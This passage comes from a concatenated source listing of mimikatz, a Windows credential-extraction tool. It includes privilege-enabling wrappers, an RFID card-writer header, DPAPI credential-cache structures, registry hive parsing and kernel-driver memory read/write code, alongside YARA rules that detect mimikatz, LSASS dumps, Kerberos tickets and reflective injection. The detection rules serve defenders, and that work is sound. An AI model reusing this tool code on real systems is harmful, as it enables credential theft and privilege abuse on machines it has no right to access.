* argv[]) 69 | { 70 | return kuhl_m_privilege_simple(SE_LOAD_DRIVER); 71 | } 72 | 73 | NTSTATUS kuhl_m_privilege_security(int argc, wchar_t * argv[]) 74 | { 75 | return kuhl_m_privilege_simple(SE_SECURITY); 76 | } 77 | 78 | NTSTATUS kuhl_m_privilege_tcb(int argc, wchar_t * argv[]) 79 | { 80 | return kuhl_m_privilege_simple(SE_TCB); 81 | } 82 | NTSTATUS kuhl_m_privilege_backup(int argc, wchar_t * argv[]) 83 | { 84 | return kuhl_m_privilege_simple(SE_BACKUP); 85 | } 86 | 87 | NTSTATUS kuhl_m_privilege_restore(int argc, wchar_t * argv[]) 88 | { 89 | return kuhl_m_privilege_simple(SE_RESTORE); 90 | } 91 | 92 | NTSTATUS kuhl_m_privilege_sysenv(int argc, wchar_t * argv[]) 93 | { 94 | return kuhl_m_privilege_simple(SE_SYSTEM_ENVIRONMENT); 95 | } -------------------------------------------------------------------------------- /modules/kull_m_sr98.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_string.h" 9 | #include "kull_m_hid.h" 10 | 11 | #define SR98_SLEEP_BEFORE_SEND 100 12 | #define SR98_SLEEP_BEFORE_RECV 100 13 | 14 | #define SR98_RATE_RF_32 0 15 | #define SR98_RATE_RF_64 1 16 | 17 | #define SR98_T5577_LOCKBIT_MASK 0x80 18 | 19 | 20 | #define SR98_IOCTL_SUPPORT_CARD 0 21 | #define SR98_IOCTL_TEST_DEVICE 1 22 | #define SR98_IOCTL_BEEP 3 23 | 24 | #define SR98_IOCTL_EEPROM_READ 4 25 | #define SR98_IOCTL_EEPROM_WRITE 5 26 | #define SR98_IOCTL_EEPROM_GET 6 27 | #define SR98_IOCTL_EEPROM_SET 7 28 | 29 | #define SR98_IOCTL_EMID_READ 16 30 | 31 | #define SR98_IOCTL_T5577 18 32 | #define SR98_SUB_IOCTL_T5577_RESET 0 33 | #define SR98_SUB_IOCTL_T5577_READ_CURRENT 1 34 | #define SR98_SUB_IOCTL_T5577_READ_PAGE 2 35 | #define SR98_SUB_IOCTL_T5577_READ_BLOCK 3 36 | #define SR98_SUB_IOCTL_T5577_WRITE_BLOCK 4 37 | #define SR98_SUB_IOCTL_T5577_READ_BLOCK_PASS 5 38 | #define SR98_SUB_IOCTL_T5577_WRITE_BLOCK_PASS 6 39 | #define SR98_SUB_IOCTL_T5577_WAKEUP 7 40 | 41 | #define SR98_IOCTL_EM4305 19 42 | #define SR98_SUB_IOCTL_EM4305_WRITE_WORD 1 43 | #define SR98_SUB_IOCTL_EM4305_READ_WORD 2 44 | #define SR98_SUB_IOCTL_EM4305_LOGIN 3 45 | #define SR98_SUB_IOCTL_EM4305_PROTECT 4 46 | #define SR98_SUB_IOCTL_EM4305_DISABLE 5 47 | 48 | #define SR98_IOCTL_EL8625A 20 49 | #define SR98_SUB_IOCTL_EL8625A_RESET 0 50 | #define SR98_SUB_IOCTL_EL8625A_WRITE_EMID 1 51 | #define SR98_SUB_IOCTL_EL8625A_RF_STOP 2 52 | #define SR98_SUB_IOCTL_EL8625A_RF_START 3 53 | #define SR98_SUB_IOCTL_EL8625A_WRITE_EMID_PASS 4 54 | 55 | #define SR98_IOCTL_MF1_PCD_RESET 32 56 | #define SR98_IOCTL_MF1_TYPEA_GET_UID 33 57 | #define SR98_IOCTL_MF1_TYPEA_REQUEST 34 58 | #define SR98_IOCTL_MF1_TYPEA_ANTICOLL 35 59 | #define SR98_IOCTL_MF1_TYPEA_SELECT 36 60 | #define SR98_IOCTL_MF1_TYPEA_HOST_AUTHKEY 37 61 | #define SR98_IOCTL_MF1_TYPEA_BLOCK_READ 38 62 | #define SR98_IOCTL_MF1_TYPEA_BLOCK_WRITE 39 63 | #define SR98_IOCTL_MF1_TYPEA_HALT 40 64 | #define SR98_IOCTL_MF1_ANTENNA 41 65 | #define SR98_IOCTL_MF1_PCD_TRANSCEIVE_BYTES 42 66 | #define SR98_IOCTL_MF1_PCD_TRANSCEIVE_BITS 43 67 | 68 | typedef struct _SR98_DEVICE { 69 | struct _SR98_DEVICE * next; 70 | DWORD id; 71 | PWCHAR DevicePath; 72 | HIDD_ATTRIBUTES hidAttributes; 73 | HIDP_CAPS hidCaps; 74 | HANDLE hDevice; 75 | } SR98_DEVICE, *PSR98_DEVICE; 76 | 77 | BOOL sr98_test_device(HANDLE hFile); 78 | BOOL sr98_beep(HANDLE hFile, BYTE duration); 79 | BOOL sr98_read_emid(HANDLE hFile, BYTE emid[5]); 80 | 81 | BOOL sr98_t5577_reset(HANDLE hFile, BYTE DataRate); 82 | BOOL sr98_t5577_write_block(HANDLE hFile, BYTE page, BYTE block, DWORD data, BYTE isPassword, DWORD password/*, BYTE lockBit*/); 83 | BOOL sr98_t5577_wipe(HANDLE hFile, BOOL resetAfter); 84 | 85 | BOOL sr98_send_receive(HANDLE hFile, BYTE ctl, LPCVOID in, BYTE szIn, LPBYTE *out, BYTE *szOut); 86 | BOOL sr98_devices_get(PSR98_DEVICE *devices, DWORD *count); 87 | void sr98_devices_free(PSR98_DEVICE devices); -------------------------------------------------------------------------------- /kiwi_passwords.yar: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | https://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : https://creativecommons.org/licenses/by/4.0/ 5 | */ 6 | rule mimikatz 7 | { 8 | meta: 9 | description = "mimikatz" 10 | author = "Benjamin DELPY (gentilkiwi)" 11 | tool_author = "Benjamin DELPY (gentilkiwi)" 12 | 13 | strings: 14 | $exe_x86_1 = { 89 71 04 89 [0-3] 30 8d 04 bd } 15 | $exe_x86_2 = { 8b 4d e? 8b 45 f4 89 75 e? 89 01 85 ff 74 } 16 | 17 | $exe_x64_1 = { 33 ff 4? 89 37 4? 8b f3 45 85 c? 74} 18 | $exe_x64_2 = { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 } 19 | 20 | $dll_1 = { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 } 21 | $dll_2 = { c7 0? 10 02 00 00 ?? 89 4? } 22 | 23 | $sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 } 24 | $sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 } 25 | 26 | condition: 27 | (all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*)) 28 | } 29 | 30 | 31 | rule mimikatz_lsass_mdmp 32 | { 33 | meta: 34 | description = "LSASS minidump file for mimikatz" 35 | author = "Benjamin DELPY (gentilkiwi)" 36 | 37 | strings: 38 | $lsass = "System32\\lsass.exe" wide nocase 39 | 40 | condition: 41 | (uint32(0) == 0x504d444d) and $lsass 42 | } 43 | 44 | 45 | rule mimikatz_kirbi_ticket 46 | { 47 | meta: 48 | description = "KiRBi ticket for mimikatz" 49 | author = "Benjamin DELPY (gentilkiwi)" 50 | 51 | strings: 52 | $asn1 = { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 } 53 | 54 | condition: 55 | $asn1 at 0 56 | } 57 | 58 | 59 | rule wce 60 | { 61 | meta: 62 | description = "wce" 63 | author = "Benjamin DELPY (gentilkiwi)" 64 | tool_author = "Hernan Ochoa (hernano)" 65 | 66 | strings: 67 | $hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 } 68 | $hex_x86 = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 } 69 | $hex_x64 = { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 } 70 | 71 | condition: 72 | any of them 73 | } 74 | 75 | 76 | rule lsadump 77 | { 78 | meta: 79 | description = "LSA dump programe (bootkey/syskey) - pwdump and others" 80 | author = "Benjamin DELPY (gentilkiwi)" 81 | 82 | strings: 83 | $str_sam_inc = "\\Domains\\Account" ascii nocase 84 | $str_sam_exc = "\\Domains\\Account\\Users\\Names\\" ascii nocase 85 | $hex_api_call = {(41 b8 | 68) 00 00 00 02 [0-64] (68 | ba) ff 07 0f 00 } 86 | $str_msv_lsa = { 4c 53 41 53 52 56 2e 44 4c 4c 00 [0-32] 6d 73 76 31 5f 30 2e 64 6c 6c 00 } 87 | $hex_bkey = { 4b 53 53 4d [20-70] 05 00 01 00} 88 | 89 | condition: 90 | ($str_sam_inc and not $str_sam_exc) or $hex_api_call or $str_msv_lsa or $hex_bkey 91 | } 92 | 93 | rule power_pe_injection 94 | { 95 | meta: 96 | description = "PowerShell with PE Reflective Injection" 97 | author = "Benjamin DELPY (gentilkiwi)" 98 | 99 | strings: 100 | $str_loadlib = "0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9" 101 | 102 | condition: 103 | $str_loadlib 104 | } -------------------------------------------------------------------------------- /plog/modules/dpapi/kuhl_m_dpapi_oe.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kuhl_m_dpapi.h" 9 | #include "../modules/rpc/kull_m_rpc_dpapi-entries.h" 10 | 11 | typedef struct _KUHL_M_DPAPI_OE_MASTERKEY_ENTRY { 12 | LIST_ENTRY navigator; 13 | KUHL_M_DPAPI_MASTERKEY_ENTRY data; 14 | } KUHL_M_DPAPI_OE_MASTERKEY_ENTRY, *PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY; 15 | 16 | #define KUHL_M_DPAPI_OE_CREDENTIAL_FLAG_MD4 0x00000001 17 | #define KUHL_M_DPAPI_OE_CREDENTIAL_FLAG_SHA1 0x00000002 18 | #define KUHL_M_DPAPI_OE_CREDENTIAL_FLAG_MD4p 0x00000004 19 | #define KUHL_M_DPAPI_OE_CREDENTIAL_FLAG_GUID 0x80000000 20 | typedef struct _KUHL_M_DPAPI_OE_CREDENTIAL_ENTRY { 21 | LIST_ENTRY navigator; 22 | KUHL_M_DPAPI_CREDENTIAL_ENTRY data; 23 | /* 24 | PVOID DPAPI_SYSTEM_machine; 25 | PVOID DPAPI_SYSTEM_user; 26 | */ 27 | } KUHL_M_DPAPI_OE_CREDENTIAL_ENTRY, *PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY; 28 | 29 | typedef struct _KUHL_M_DPAPI_OE_DOMAINKEY_ENTRY { 30 | LIST_ENTRY navigator; 31 | KUHL_M_DPAPI_DOMAINKEY_ENTRY data; 32 | } KUHL_M_DPAPI_OE_DOMAINKEY_ENTRY, *PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY; 33 | 34 | NTSTATUS kuhl_m_dpapi_oe_clean(); 35 | NTSTATUS kuhl_m_dpapi_oe_cache(int argc, wchar_t * argv[]); 36 | BOOL kuhl_m_dpapi_oe_is_sid_valid_ForCacheOrAuto(PSID sid, LPCWSTR szSid, BOOL AutoOrCache); 37 | BOOL kuhl_m_dpapi_oe_autosid(LPCWSTR filename, LPWSTR * pSid); 38 | 39 | LIST_ENTRY gDPAPI_Masterkeys; 40 | LIST_ENTRY gDPAPI_Credentials; 41 | LIST_ENTRY gDPAPI_Domainkeys; 42 | 43 | PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY kuhl_m_dpapi_oe_masterkey_get(LPCGUID guid); 44 | BOOL kuhl_m_dpapi_oe_masterkey_add(LPCGUID guid, LPCVOID key, DWORD keyLen); 45 | void kuhl_m_dpapi_oe_masterkey_delete(PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY entry); 46 | void kuhl_m_dpapi_oe_masterkey_descr(PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY entry); 47 | void kuhl_m_dpapi_oe_masterkeys_delete(); 48 | void kuhl_m_dpapi_oe_masterkeys_descr(); 49 | 50 | PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY kuhl_m_dpapi_oe_credential_get(LPCWSTR sid, LPCGUID guid); 51 | BOOL kuhl_m_dpapi_oe_credential_add(LPCWSTR sid, LPCGUID guid, LPCVOID md4hash, LPCVOID sha1hash, LPCVOID md4protectedhash, LPCWSTR password); 52 | void kuhl_m_dpapi_oe_credential_delete(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY entry); 53 | void kuhl_m_dpapi_oe_credential_descr(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY entry); 54 | void kuhl_m_dpapi_oe_credentials_delete(); 55 | void kuhl_m_dpapi_oe_credentials_descr(); 56 | 57 | PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY kuhl_m_dpapi_oe_domainkey_get(LPCGUID guid); 58 | BOOL kuhl_m_dpapi_oe_domainkey_add(LPCGUID guid, LPCVOID key, DWORD keyLen, BOOL isNewKey); 59 | void kuhl_m_dpapi_oe_domainkey_delete(PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY entry); 60 | void kuhl_m_dpapi_oe_domainkey_descr(PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY entry); 61 | void kuhl_m_dpapi_oe_domainkeys_delete(); 62 | void kuhl_m_dpapi_oe_domainkeys_descr(); 63 | 64 | BOOL kuhl_m_dpapi_oe_credential_addtoEntry(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY entry, LPCGUID guid, LPCVOID md4hash, LPCVOID sha1hash, LPCVOID md4protectedhash, LPCWSTR password); 65 | BOOL kuhl_m_dpapi_oe_credential_copyEntryWithNewGuid(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY entry, LPCGUID guid); 66 | 67 | BOOL kuhl_m_dpapi_oe_SaveToFile(LPCWSTR filename); 68 | BOOL kuhl_m_dpapi_oe_LoadFromFile(LPCWSTR filename); -------------------------------------------------------------------------------- /modules/kull_m_registry_structures.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | 9 | #define KULL_M_REGISTRY_HIVE_KEY_NAMED_FLAG_VOLATILE 0x0001 10 | #define KULL_M_REGISTRY_HIVE_KEY_NAMED_FLAG_MOUNT_POINT 0x0002 11 | #define KULL_M_REGISTRY_HIVE_KEY_NAMED_FLAG_ROOT 0x0004 12 | #define KULL_M_REGISTRY_HIVE_KEY_NAMED_FLAG_LOCKED 0x0008 13 | #define KULL_M_REGISTRY_HIVE_KEY_NAMED_FLAG_SYMLINK 0x0010 14 | #define KULL_M_REGISTRY_HIVE_KEY_NAMED_FLAG_ASCII_NAME 0x0020 15 | 16 | #define KULL_M_REGISTRY_HIVE_VALUE_KEY_FLAG_ASCII_NAME 0x0001 17 | 18 | typedef struct _KULL_M_REGISTRY_HIVE_HEADER 19 | { 20 | DWORD tag; 21 | DWORD seqPri; 22 | DWORD seqSec; 23 | FILETIME lastModification; 24 | DWORD versionMajor; 25 | DWORD versionMinor; 26 | DWORD fileType; 27 | DWORD unk0; 28 | LONG offsetRootKey; 29 | DWORD szData; 30 | DWORD unk1; 31 | BYTE unk2[64]; 32 | BYTE unk3[396]; 33 | DWORD checksum; 34 | BYTE padding[3584]; 35 | } KULL_M_REGISTRY_HIVE_HEADER, *PKULL_M_REGISTRY_HIVE_HEADER; 36 | 37 | typedef struct _KULL_M_REGISTRY_HIVE_BIN_HEADER 38 | { 39 | DWORD tag; 40 | LONG offsetHiveBin; 41 | DWORD szHiveBin; 42 | DWORD unk0; 43 | DWORD unk1; 44 | FILETIME timestamp; 45 | DWORD unk2; 46 | } KULL_M_REGISTRY_HIVE_BIN_HEADER, *PKULL_M_REGISTRY_HIVE_BIN_HEADER; 47 | 48 | typedef struct _KULL_M_REGISTRY_HIVE_BIN_CELL 49 | { 50 | LONG szCell; 51 | union{ 52 | WORD tag; 53 | BYTE data[ANYSIZE_ARRAY]; 54 | }; 55 | } KULL_M_REGISTRY_HIVE_BIN_CELL, *PKULL_M_REGISTRY_HIVE_BIN_CELL; 56 | 57 | typedef struct _KULL_M_REGISTRY_HIVE_KEY_NAMED 58 | { 59 | LONG szCell; 60 | WORD tag; 61 | WORD flags; 62 | FILETIME lastModification; 63 | DWORD unk0; 64 | LONG offsetParentKey; 65 | DWORD nbSubKeys; 66 | DWORD nbVolatileSubKeys; 67 | LONG offsetSubKeys; 68 | LONG offsetVolatileSubkeys; 69 | DWORD nbValues; 70 | LONG offsetValues; 71 | LONG offsetSecurityKey; 72 | LONG offsetClassName; 73 | DWORD szMaxSubKeyName; 74 | DWORD szMaxSubKeyClassName; 75 | DWORD szMaxValueName; 76 | DWORD szMaxValueData; 77 | DWORD unk1; 78 | WORD szKeyName; 79 | WORD szClassName; 80 | BYTE keyName[ANYSIZE_ARRAY]; 81 | } KULL_M_REGISTRY_HIVE_KEY_NAMED, *PKULL_M_REGISTRY_HIVE_KEY_NAMED; 82 | 83 | typedef struct _KULL_M_REGISTRY_HIVE_VALUE_KEY 84 | { 85 | LONG szCell; 86 | WORD tag; 87 | WORD szValueName; 88 | DWORD szData; 89 | LONG offsetData; 90 | DWORD typeData; 91 | WORD flags; 92 | WORD __align; 93 | BYTE valueName[ANYSIZE_ARRAY]; 94 | } KULL_M_REGISTRY_HIVE_VALUE_KEY, *PKULL_M_REGISTRY_HIVE_VALUE_KEY; 95 | 96 | typedef struct _KULL_M_REGISTRY_HIVE_LF_LH_ELEMENT 97 | { 98 | LONG offsetNamedKey; 99 | DWORD hash; 100 | } KULL_M_REGISTRY_HIVE_LF_LH_ELEMENT, *PKULL_M_REGISTRY_HIVE_LF_LH_ELEMENT; 101 | 102 | typedef struct _KULL_M_REGISTRY_HIVE_LF_LH 103 | { 104 | LONG szCell; 105 | WORD tag; 106 | WORD nbElements; 107 | KULL_M_REGISTRY_HIVE_LF_LH_ELEMENT elements[ANYSIZE_ARRAY]; 108 | } KULL_M_REGISTRY_HIVE_LF_LH, *PKULL_M_REGISTRY_HIVE_LF_LH; 109 | 110 | typedef struct _KULL_M_REGISTRY_HIVE_VALUE_LIST 111 | { 112 | LONG szCell; 113 | LONG offsetValue[ANYSIZE_ARRAY]; 114 | } KULL_M_REGISTRY_HIVE_VALUE_LIST, *PKULL_M_REGISTRY_HIVE_VALUE_LIST; -------------------------------------------------------------------------------- /mimidrv/kkll_m_memory.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kkll_m_memory.h" 7 | 8 | NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, PUCHAR *addressePattern, SIZE_T longueur) 9 | { 10 | for(*addressePattern = adresseBase; (adresseMaxMin > adresseBase) ? (*addressePattern <= adresseMaxMin) : (*addressePattern >= adresseMaxMin); *addressePattern += (adresseMaxMin > adresseBase) ? 1 : -1) 11 | if(RtlEqualMemory(pattern, *addressePattern, longueur)) 12 | return STATUS_SUCCESS; 13 | *addressePattern = NULL; 14 | return STATUS_NOT_FOUND; 15 | } 16 | 17 | NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, SIZE_T longueur, LONG offsetTo) 18 | { 19 | NTSTATUS status = kkll_m_memory_search(adresseBase, adresseMaxMin, pattern, addressePointeur, longueur); 20 | if(NT_SUCCESS(status)) 21 | { 22 | *addressePointeur += offsetTo; 23 | #if defined(_M_X64) 24 | *addressePointeur += sizeof(LONG) + *(PLONG)(*addressePointeur); 25 | #elif defined(_M_IX86) 26 | *addressePointeur = *(PUCHAR *)(*addressePointeur); 27 | #endif 28 | 29 | if(!*addressePointeur) 30 | status = STATUS_INVALID_HANDLE; 31 | } 32 | return status; 33 | } 34 | 35 | PKKLL_M_MEMORY_GENERIC kkll_m_memory_getGenericFromBuild(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics) 36 | { 37 | SIZE_T i; 38 | for(i = 0; i < cbGenerics; i++) 39 | if(generics[i].OsIndex == KiwiOsIndex) 40 | return generics + i; 41 | return NULL; 42 | } 43 | 44 | NTSTATUS kkll_m_memory_vm_read(PVOID Dest, PVOID From, DWORD Size) 45 | { 46 | NTSTATUS status = STATUS_MEMORY_NOT_ALLOCATED; 47 | PMDL pMdl; 48 | if(pMdl = IoAllocateMdl(From, Size, FALSE, FALSE, NULL)) 49 | { 50 | __try 51 | { 52 | MmProbeAndLockPages(pMdl, KernelMode, IoReadAccess); 53 | RtlCopyMemory(Dest, From, Size); 54 | status = STATUS_SUCCESS; 55 | MmUnlockPages(pMdl); 56 | } 57 | __except(EXCEPTION_EXECUTE_HANDLER) 58 | { 59 | status = GetExceptionCode(); 60 | } 61 | IoFreeMdl(pMdl); 62 | } 63 | return status; 64 | } 65 | 66 | NTSTATUS kkll_m_memory_vm_write(PVOID Dest, PVOID From, DWORD Size) 67 | { 68 | NTSTATUS status = STATUS_MEMORY_NOT_ALLOCATED; 69 | PMDL pMdl; 70 | if(pMdl = IoAllocateMdl(Dest, Size, FALSE, FALSE, NULL)) 71 | { 72 | __try 73 | { 74 | MmProbeAndLockPages(pMdl, KernelMode, IoWriteAccess); 75 | RtlCopyMemory(Dest, From, Size); 76 | status = STATUS_SUCCESS; 77 | MmUnlockPages(pMdl); 78 | } 79 | __except(EXCEPTION_EXECUTE_HANDLER) 80 | { 81 | status = GetExceptionCode(); 82 | } 83 | IoFreeMdl(pMdl); 84 | } 85 | return status; 86 | } 87 | 88 | NTSTATUS kkll_m_memory_vm_alloc(DWORD Size, PVOID *Addr) 89 | { 90 | NTSTATUS status = STATUS_DATA_NOT_ACCEPTED; 91 | if(Addr) 92 | { 93 | if(*Addr = ExAllocatePoolWithTag(NonPagedPool, Size, POOL_TAG)) 94 | status = STATUS_SUCCESS; 95 | else 96 | status = STATUS_MEMORY_NOT_ALLOCATED; 97 | } 98 | return status; 99 | } 100 | 101 | NTSTATUS kkll_m_memory_vm_free(PVOID Addr) 102 | { 103 | NTSTATUS status = STATUS_DATA_NOT_ACCEPTED; 104 | if(Addr) 105 | { 106 | ExFreePoolWithTag(Addr, POOL_TAG); 107 | status = STATUS_SUCCESS; 108 | } 109 | return status; 110 | } -------------------------------------------------------------------------------- /modules/kull_m_output.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_output.h" 7 | 8 | FILE * logfile = NULL; 9 | #if !defined(MIMIKATZ_W2000_SUPPORT) 10 | wchar_t * outputBuffer = NULL; 11 | size_t outputBufferElements = 0, outputBufferElementsPosition = 0; 12 | #endif 13 | 14 | void kprintf(PCWCHAR format, ...) 15 | { 16 | #if !defined(MIMIKATZ_W2000_SUPPORT) 17 | int varBuf; 18 | size_t tempSize; 19 | wchar_t * tmpBuffer; 20 | #endif 21 | va_list args; 22 | va_start(args, format); 23 | #if !defined(MIMIKATZ_W2000_SUPPORT) 24 | if(outputBuffer) 25 | { 26 | varBuf = _vscwprintf(format, args); 27 | if(varBuf > 0) 28 | { 29 | if((size_t) varBuf > (outputBufferElements - outputBufferElementsPosition - 1)) // NULL character 30 | { 31 | tempSize = (outputBufferElements + varBuf + 1) * 2; // * 2, just to be cool 32 | if(tmpBuffer = (wchar_t *) LocalAlloc(LPTR, tempSize * sizeof(wchar_t))) 33 | { 34 | RtlCopyMemory(tmpBuffer, outputBuffer, outputBufferElementsPosition * sizeof(wchar_t)); 35 | LocalFree(outputBuffer); 36 | outputBuffer = tmpBuffer; 37 | outputBufferElements = tempSize; 38 | } 39 | else wprintf(L"Erreur LocalAlloc: %u\n", GetLastError()); 40 | //if(outputBuffer = (wchar_t *) LocalReAlloc(outputBuffer, tempSize * sizeof(wchar_t), LPTR)) 41 | // outputBufferElements = tempSize; 42 | //else wprintf(L"Erreur ReAlloc: %u\n", GetLastError()); 43 | } 44 | varBuf = vswprintf_s(outputBuffer + outputBufferElementsPosition, outputBufferElements - outputBufferElementsPosition, format, args); 45 | if(varBuf > 0) 46 | outputBufferElementsPosition += varBuf; 47 | } 48 | } 49 | #endif 50 | #if !defined(_POWERKATZ) 51 | #if !defined(MIMIKATZ_W2000_SUPPORT) 52 | else 53 | #endif 54 | { 55 | vwprintf(format, args); 56 | fflush(stdout); 57 | } 58 | #endif 59 | if(logfile) 60 | { 61 | vfwprintf(logfile, format, args); 62 | fflush(logfile); 63 | } 64 | va_end(args); 65 | } 66 | 67 | void kprintf_inputline(PCWCHAR format, ...) 68 | { 69 | va_list args; 70 | va_start(args, format); 71 | if(logfile) 72 | { 73 | vfwprintf(logfile, format, args); 74 | fflush(logfile); 75 | } 76 | va_end(args); 77 | } 78 | 79 | BOOL kull_m_output_file(PCWCHAR file) 80 | { 81 | BOOL status = FALSE; 82 | FILE * newlog = NULL; 83 | 84 | if(file) 85 | #pragma warning(push) 86 | #pragma warning(disable:4996) 87 | newlog = _wfopen(file, L"a"); // XP does not like _wfopen_s 88 | #pragma warning(pop) 89 | if(newlog || !file) 90 | { 91 | if(logfile) 92 | fclose(logfile); 93 | logfile = newlog; 94 | } 95 | return (!file || (file && logfile)); 96 | } 97 | 98 | int previousStdOut, previousStdErr; 99 | UINT previousConsoleOutput; 100 | void kull_m_output_init() 101 | { 102 | #if !defined(_POWERKATZ) 103 | #if !defined(_WINDLL) 104 | previousStdOut = _setmode(_fileno(stdout), _O_U8TEXT); 105 | previousStdErr = _setmode(_fileno(stderr), _O_U8TEXT); 106 | #endif 107 | previousConsoleOutput = GetConsoleOutputCP(); 108 | SetConsoleOutputCP(CP_UTF8); 109 | #endif 110 | } 111 | 112 | void kull_m_output_clean() 113 | { 114 | #if !defined(_POWERKATZ) 115 | #if !defined(_WINDLL) 116 | _setmode(_fileno(stdout), previousStdOut); 117 | _setmode(_fileno(stderr), previousStdErr); 118 | #endif 119 | SetConsoleOutputCP(previousConsoleOutput); 120 | #endif 121 | } -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-dcom_IObjectExporter_c.c: -------------------------------------------------------------------------------- 1 | #include "kull_m_rpc_ms-dcom_IObjectExporter.h" 2 | 3 | #define TYPE_FORMAT_STRING_SIZE 49 4 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 5 | #define PROC_FORMAT_STRING_SIZE 55 6 | #elif defined(_M_IX86) 7 | #define PROC_FORMAT_STRING_SIZE 53 8 | #endif 9 | 10 | typedef struct _IObjectExporter_MIDL_TYPE_FORMAT_STRING { 11 | short Pad; 12 | unsigned char Format[TYPE_FORMAT_STRING_SIZE]; 13 | } IObjectExporter_MIDL_TYPE_FORMAT_STRING; 14 | 15 | typedef struct _IObjectExporter_MIDL_PROC_FORMAT_STRING { 16 | short Pad; 17 | unsigned char Format[PROC_FORMAT_STRING_SIZE]; 18 | } IObjectExporter_MIDL_PROC_FORMAT_STRING; 19 | 20 | extern const IObjectExporter_MIDL_TYPE_FORMAT_STRING IObjectExporter__MIDL_TypeFormatString; 21 | extern const IObjectExporter_MIDL_PROC_FORMAT_STRING IObjectExporter__MIDL_ProcFormatString; 22 | static const RPC_CLIENT_INTERFACE IObjectExporter___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x99fcfec4, 0x5260, 0x101b, {0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a}}, {0, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000}; 23 | static RPC_BINDING_HANDLE IObjectExporter__MIDL_AutoBindHandle; 24 | static const MIDL_STUB_DESC IObjectExporter_StubDesc = {(void *) &IObjectExporter___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &IObjectExporter__MIDL_AutoBindHandle, 0, 0, 0, 0, IObjectExporter__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0}; 25 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 26 | error_status_t ServerAlive2(handle_t hRpc, COMVERSION *pComVersion, DUALSTRINGARRAY **ppdsaOrBindings, DWORD *pReserved) 27 | { 28 | return (error_status_t) NdrClientCall2((PMIDL_STUB_DESC) &IObjectExporter_StubDesc, (PFORMAT_STRING) &IObjectExporter__MIDL_ProcFormatString.Format[0], hRpc, pComVersion, ppdsaOrBindings, pReserved).Simple; 29 | } 30 | static const IObjectExporter_MIDL_PROC_FORMAT_STRING IObjectExporter__MIDL_ProcFormatString = {0, { 31 | 0x00, 0x48, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x00, 0x45, 0x04, 0x0a, 0x03, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x21, 32 | 